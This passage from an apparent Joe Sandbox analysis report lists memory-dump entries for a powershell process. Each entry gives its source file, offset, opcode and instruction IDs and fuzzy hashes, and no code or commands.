                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e7f26e7436f6c88df0fdfcc305acabc10be0060394a9c480994d9f6a1a26ffa4
                                                                                                                                                                                • Instruction ID: 6315dc51456e34b4a9a421102691b97a0ba718603255a169ace063632bc1a511
                                                                                                                                                                                • Opcode Fuzzy Hash: e7f26e7436f6c88df0fdfcc305acabc10be0060394a9c480994d9f6a1a26ffa4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0021D038700218AFDB00DFA4E854BAEB7B2FF85342F148179E505AB390DB34D981CB10
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fe8a120520162e8f6164f2c4cc7cd01b3de73c3033b47b2559915978d226b01d
                                                                                                                                                                                • Instruction ID: bd0457bde14d8512f05eed3664f65fe31d46ca5cab7ae8dd84a9cc1e6e89f4a0
                                                                                                                                                                                • Opcode Fuzzy Hash: fe8a120520162e8f6164f2c4cc7cd01b3de73c3033b47b2559915978d226b01d
                                                                                                                                                                                • Instruction Fuzzy Hash: 45114274E0030CAFDB45EBA4C9147AEBBB2EF85301F1185B9C209AB391DB749E458B51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2635daa4542463e2551bf0cff3b6dd9e0bfea8622d0abc0f07062134e403f63
                                                                                                                                                                                • Instruction ID: 8f12a532e598988910f100e964dca1d3e761829dcb141910c33417bbbbf7c08e
                                                                                                                                                                                • Opcode Fuzzy Hash: a2635daa4542463e2551bf0cff3b6dd9e0bfea8622d0abc0f07062134e403f63
                                                                                                                                                                                • Instruction Fuzzy Hash: C0118835A01228CFCF61CF99D49499DBFB1EF89372F1640A9E801AB355DB71AC42CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f805f6b5f9d821326af2848842df618da7431f3e8719afac37cf47286c346520
                                                                                                                                                                                • Instruction ID: 417e8580015ea27bdc469fe03b82b2ca3f43cb9a3dbb52d9944b360a308468e3
                                                                                                                                                                                • Opcode Fuzzy Hash: f805f6b5f9d821326af2848842df618da7431f3e8719afac37cf47286c346520
                                                                                                                                                                                • Instruction Fuzzy Hash: D8112170B00609CFDB25DB28D854BAEB7B6EF58341F10846CD856A7294DF71D905CF94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 594f0c052a454665a926ba474b94c141f9f90472e9568ba97d95ba7ab5b569e3
                                                                                                                                                                                • Instruction ID: 02351d456a52882c1ab036a167c380d187eda9cfefdef79ba95526c701471a95
                                                                                                                                                                                • Opcode Fuzzy Hash: 594f0c052a454665a926ba474b94c141f9f90472e9568ba97d95ba7ab5b569e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B112C71D002198FCB04EFA8C540AEDBBB1EF88351F14866DC505EB250E7309945CBA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7b9f4c2a3c1f21b62477d88c9d1b59be0fe88123781a53b959706465c82364c2
                                                                                                                                                                                • Instruction ID: a8d23cfe3b31e960be58b58f9d6e2b9e33a0ea5a95d1518e825b50229eaf0250
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b9f4c2a3c1f21b62477d88c9d1b59be0fe88123781a53b959706465c82364c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E2136B1C0065A9FDB10CF9AC5447EEFBF4EB48260F10822AD818A3240D778A955CFA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d4d2edfd09ab91f0929bb9f2db621e9c6092bf4038f7231e011fc88a50459a31
                                                                                                                                                                                • Instruction ID: 68da440f901182add0cc7e5e0d9a0685f9f9e2599cf88427df2935fecc63f32f
                                                                                                                                                                                • Opcode Fuzzy Hash: d4d2edfd09ab91f0929bb9f2db621e9c6092bf4038f7231e011fc88a50459a31
                                                                                                                                                                                • Instruction Fuzzy Hash: CF2158B1C0165A8FDB10CF9AC4447EEFBF0EB48320F14822AD818A3240D374A955CFA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16ad729e5cab9911a3565311bd9a3feb26659844c4184cada6e94182f5745dcd
                                                                                                                                                                                • Instruction ID: 3f10f69a6d08495b1458a40c0e86288c9fffd1f4df55623eff3a74b66ee1fa3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 16ad729e5cab9911a3565311bd9a3feb26659844c4184cada6e94182f5745dcd
                                                                                                                                                                                • Instruction Fuzzy Hash: BB01B531704B168FDB309EB9D400BA673DCEB406D6F04467EE94ECB691D666EC41A390
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6065eb8d49e73a596f7883381b0f89eda4804530b088c1edf1db04b34f643534
                                                                                                                                                                                • Instruction ID: b4895ce1182bcd6be9ced624301d3e2a9697e307a6fe0b5c72216a1d78100182
                                                                                                                                                                                • Opcode Fuzzy Hash: 6065eb8d49e73a596f7883381b0f89eda4804530b088c1edf1db04b34f643534
                                                                                                                                                                                • Instruction Fuzzy Hash: E411C131A002688BEF18CF69C5447AEBBF6EF85601F1840ADC451A7242DBB59D04C7E4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d6e7b4e3608e49a60e80648f0b8a08365508e0bff5dcfe3c0d175f697dac9c4b
                                                                                                                                                                                • Instruction ID: 47b6db49cb685a8b278e329bc1ea73dedafdfc4331d4c68db6e8be48b00bc1f1
                                                                                                                                                                                • Opcode Fuzzy Hash: d6e7b4e3608e49a60e80648f0b8a08365508e0bff5dcfe3c0d175f697dac9c4b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D11A735B002149FDB14DF6CD058AAEBFE6AF88351F15415AE401FB391CEB59C05CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f1d5434c52423255179b936d7b6b30ed7c8a34b4abec103c2fafe320dbae1db8
                                                                                                                                                                                • Instruction ID: effd40a685bf1d12fd7c90070dfa210827c5c45792a27c3d521f3b108d99cbcf
                                                                                                                                                                                • Opcode Fuzzy Hash: f1d5434c52423255179b936d7b6b30ed7c8a34b4abec103c2fafe320dbae1db8
                                                                                                                                                                                • Instruction Fuzzy Hash: AE11C22160E7C09FCB225639B8153657F714F832B2F1902FFD0C2CB593C668888AE762
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfc8aec842bd68864fad05a813e1dca89a46673e9e08367a1e691de9655f31e4
                                                                                                                                                                                • Instruction ID: a5465fe28dbceb7b956bc62ab25625f542b6b1240f6cafbd32ea45eb29180228
                                                                                                                                                                                • Opcode Fuzzy Hash: cfc8aec842bd68864fad05a813e1dca89a46673e9e08367a1e691de9655f31e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C11A970A013559FDB01DBB8D840BEE7BF9EF89341F04416BE904E7242D7798A05CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 870074d7c1eaa93d1fc9edf259563a7cd745ee8d94f893e8619de92175f8f393
                                                                                                                                                                                • Instruction ID: 749db6fcff1cc2c1c18f024ac7dd050c3cfc2514223a591b5682364f53f59e75
                                                                                                                                                                                • Opcode Fuzzy Hash: 870074d7c1eaa93d1fc9edf259563a7cd745ee8d94f893e8619de92175f8f393
                                                                                                                                                                                • Instruction Fuzzy Hash: 6201C4757082A49FCB05DF99D8409AEBFE5EF8922170580BBE908CB362CA35CC15C760
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67f9051c32cb7974aa5435a22aa1d686bee6525c0a8478adf62fc03baa1a9741
                                                                                                                                                                                • Instruction ID: dbb421df9e2d6d6c13ca741e7e3e908ad10738afe43e13d98dee7ff273ad8ee0
                                                                                                                                                                                • Opcode Fuzzy Hash: 67f9051c32cb7974aa5435a22aa1d686bee6525c0a8478adf62fc03baa1a9741
                                                                                                                                                                                • Instruction Fuzzy Hash: DC112175B046149FCB05CF79D58886EBFF2FF89211B20806DE84A87311DB708902CB40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b75faf0d6f2875e3461a1f4854dc65dc5d9d853b0d9f39671e413316ee5434e
                                                                                                                                                                                • Instruction ID: af14bd26ee3ea9477b6eb080342908eb7f1c86362b9e90f66ee69bff1845e9c6
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b75faf0d6f2875e3461a1f4854dc65dc5d9d853b0d9f39671e413316ee5434e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1301CC32D0170EABCF01DBA4DC001DEFB72EF86301F1102A6E5107B160EB70294ACBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 31de12005ed9e95a2ca2117ea5a8d985d97a5fd5f77dbe4dd153b95c78cc93a2
                                                                                                                                                                                • Instruction ID: 0f791a365abc98e4fd05e365ba2fb93cbd59a7f611d5396d834da5385762dcaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 31de12005ed9e95a2ca2117ea5a8d985d97a5fd5f77dbe4dd153b95c78cc93a2
                                                                                                                                                                                • Instruction Fuzzy Hash: 980128353043451FD301EB68DC5086EBBAAEFC6291711067ED285CB252CA719C09C7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: da3c4b47e66776ccb0c974feddc9564988a4cc22389b7267e3b886e81b98ba12
                                                                                                                                                                                • Instruction ID: 39bcda480a7947fca952ea9f3c10cbcab8e5074d64829bcd63870f7d1bc50cf4
                                                                                                                                                                                • Opcode Fuzzy Hash: da3c4b47e66776ccb0c974feddc9564988a4cc22389b7267e3b886e81b98ba12
                                                                                                                                                                                • Instruction Fuzzy Hash: 69112174E0030CAFDB44EBA4C854BAEB7B1EF84301F1085B9C205AB294DA749E418B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a19e1d09ae0b2b499801a4664b7eae07f24f01209f1dda4d78502cd437e34d60
                                                                                                                                                                                • Instruction ID: b628840955488a4a05407bd26d3866c3d02dbf73152c317a7d9224ee123a291a
                                                                                                                                                                                • Opcode Fuzzy Hash: a19e1d09ae0b2b499801a4664b7eae07f24f01209f1dda4d78502cd437e34d60
                                                                                                                                                                                • Instruction Fuzzy Hash: B1119171D042A98FEF24CBA8C8407EDBFF2AF59310F18849DC481B7281C6745984DB65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3284738c3f559b49df87b4702bcbf319fc14d20508fb205d9b4a88d5be1af7cf
                                                                                                                                                                                • Instruction ID: 11a65e53471c65f7d528e20e1250e255bc955929077e18c1262625572d9f18f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 3284738c3f559b49df87b4702bcbf319fc14d20508fb205d9b4a88d5be1af7cf
                                                                                                                                                                                • Instruction Fuzzy Hash: 6A11C474B016159F8F15DF69D64886EBFF6FFC8611720802DE80A93341DB709A02CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 27695d4719b97edbe3ee81348e9eb500850eab4d369edfbb37d5c3a7ddbae2f8
                                                                                                                                                                                • Instruction ID: e9fd2a2d269c4ded99ade4aa440352ab8452943bceaec080a6e89c058c3d1d06
                                                                                                                                                                                • Opcode Fuzzy Hash: 27695d4719b97edbe3ee81348e9eb500850eab4d369edfbb37d5c3a7ddbae2f8
                                                                                                                                                                                • Instruction Fuzzy Hash: D3117C352003009FD714EB25D880A9EB7A2FFC4254F148A39E5868F261DAB1EC4AC792
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ab324389197bf829e3fd9522baa842a8267455462b08dee91827619d2eb14548
                                                                                                                                                                                • Instruction ID: b9fa04fd01caa758e888364832093514b669d5a259df51551452ae610617b36e
                                                                                                                                                                                • Opcode Fuzzy Hash: ab324389197bf829e3fd9522baa842a8267455462b08dee91827619d2eb14548
                                                                                                                                                                                • Instruction Fuzzy Hash: DD114834A102158FCB689B68D4546ACB7F2FF9D352B5584ADE805AB344CB75E881CFA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 482899f945f8326bc845471c73bbce70e1cb50a908eec92669513e3eee74e75b
                                                                                                                                                                                • Instruction ID: 21e6d0377ceaace5a051355c55d3813174433b6d1141357815fa729d5e177a70
                                                                                                                                                                                • Opcode Fuzzy Hash: 482899f945f8326bc845471c73bbce70e1cb50a908eec92669513e3eee74e75b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6711AC32A002448FDB21CF58D9009EABBF6EF88311B14866DD489A3211D731A905CBE0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c084beda4055db4d9c487f929679d4ee8a850e9c858aca20f381c174a2fc9bc9
                                                                                                                                                                                • Instruction ID: 631677d04f68e1e6bd02f71719a09f5fe5e8b888478739464c69a714103444e6
                                                                                                                                                                                • Opcode Fuzzy Hash: c084beda4055db4d9c487f929679d4ee8a850e9c858aca20f381c174a2fc9bc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 9F118234B002049FDB149B69C458AADBBFAAF88711F14415AE402E7390CEB59C05CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2173429287.0000000008D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5f52b8a7582057f5d3d05789e52aec717415e9c6fd6b732bd1b015904dc6714a
                                                                                                                                                                                • Instruction ID: 5a678a39aace1cf65034107b918f58750e52c967409ed301ca11ea357009736b
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f52b8a7582057f5d3d05789e52aec717415e9c6fd6b732bd1b015904dc6714a
                                                                                                                                                                                • Instruction Fuzzy Hash: 09019E357007248FCB24EB66D954A3FB7FAEBC9762B10442DE64287740DBB5EC418BA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2173096806.0000000008D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8d30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ffef9a8949ab9b96ca761e8413bda31a06be4d4f9639121ad0f7b345727ae0a3
                                                                                                                                                                                • Instruction ID: 5514196122337da27cbbe5f547a12f772c875e84d44d3cb8869d1ea2ba472f9a
                                                                                                                                                                                • Opcode Fuzzy Hash: ffef9a8949ab9b96ca761e8413bda31a06be4d4f9639121ad0f7b345727ae0a3
                                                                                                                                                                                • Instruction Fuzzy Hash: C1210A34A10209CFDB05DFA4D494E9DBBB2FF88311F1595A8D505AB362CB75D881CF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0fa38af3dad023600802fcd8581101dc727bfa0fbd9c4cca355c975cf0781e5b
                                                                                                                                                                                • Instruction ID: 81f4557deafa97e817248c9178e5723673e2cb549b34ae560f851e47a574f486
                                                                                                                                                                                • Opcode Fuzzy Hash: 0fa38af3dad023600802fcd8581101dc727bfa0fbd9c4cca355c975cf0781e5b
                                                                                                                                                                                • Instruction Fuzzy Hash: A811E835A00329CFDB14DFA4D888AEDB7BAFF48306F114169E506AB245DB34ED46CB50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dc99f41fa4c538e9f6ec18de09e89cb7e03e98ba49b5c227cab729769f60d7ca
                                                                                                                                                                                • Instruction ID: a6199239250ec247679f3d0c6f2ca90eb575624daf41d4d56272595dd3633da5
                                                                                                                                                                                • Opcode Fuzzy Hash: dc99f41fa4c538e9f6ec18de09e89cb7e03e98ba49b5c227cab729769f60d7ca
                                                                                                                                                                                • Instruction Fuzzy Hash: D0014534300661CFD350DB38D448B2DBBE1DF89321F0581AEE60A8B3A2CB65EC04CBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dfe73734c99631e9714a34abeab5dc3a0c613084d185aa0d16d933dea54cbc64
                                                                                                                                                                                • Instruction ID: 32d8a0f21900704f13423dde169213a8a9ced807fef72a650b3d01983bfdaffc
                                                                                                                                                                                • Opcode Fuzzy Hash: dfe73734c99631e9714a34abeab5dc3a0c613084d185aa0d16d933dea54cbc64
                                                                                                                                                                                • Instruction Fuzzy Hash: 44010070200B455FE325EF66E884B6AF7E5FF84355F00863ED84983780DBB4A808CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9fcc82a291191f029923ccefd133199ede46ac07ad21ea9622fc25bd7e0604f8
                                                                                                                                                                                • Instruction ID: aaa02e15644f3cd03d74e92edf8b1883672f1a9a70f887f93c56ba7b6b1fd9d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fcc82a291191f029923ccefd133199ede46ac07ad21ea9622fc25bd7e0604f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D114874A003058FDB20DF68EA8098CB7F1FF48361B204399E855AB3A1CB31ED01CB94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19d8438101020c071bfb3d5ff9b2b35afce55ef0283ac020e88765c36c9c3be2
                                                                                                                                                                                • Instruction ID: 8618070705d62bfb0cd28bbe2829cb3db8f73c1297b5bbc5f421bc2122c631c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 19d8438101020c071bfb3d5ff9b2b35afce55ef0283ac020e88765c36c9c3be2
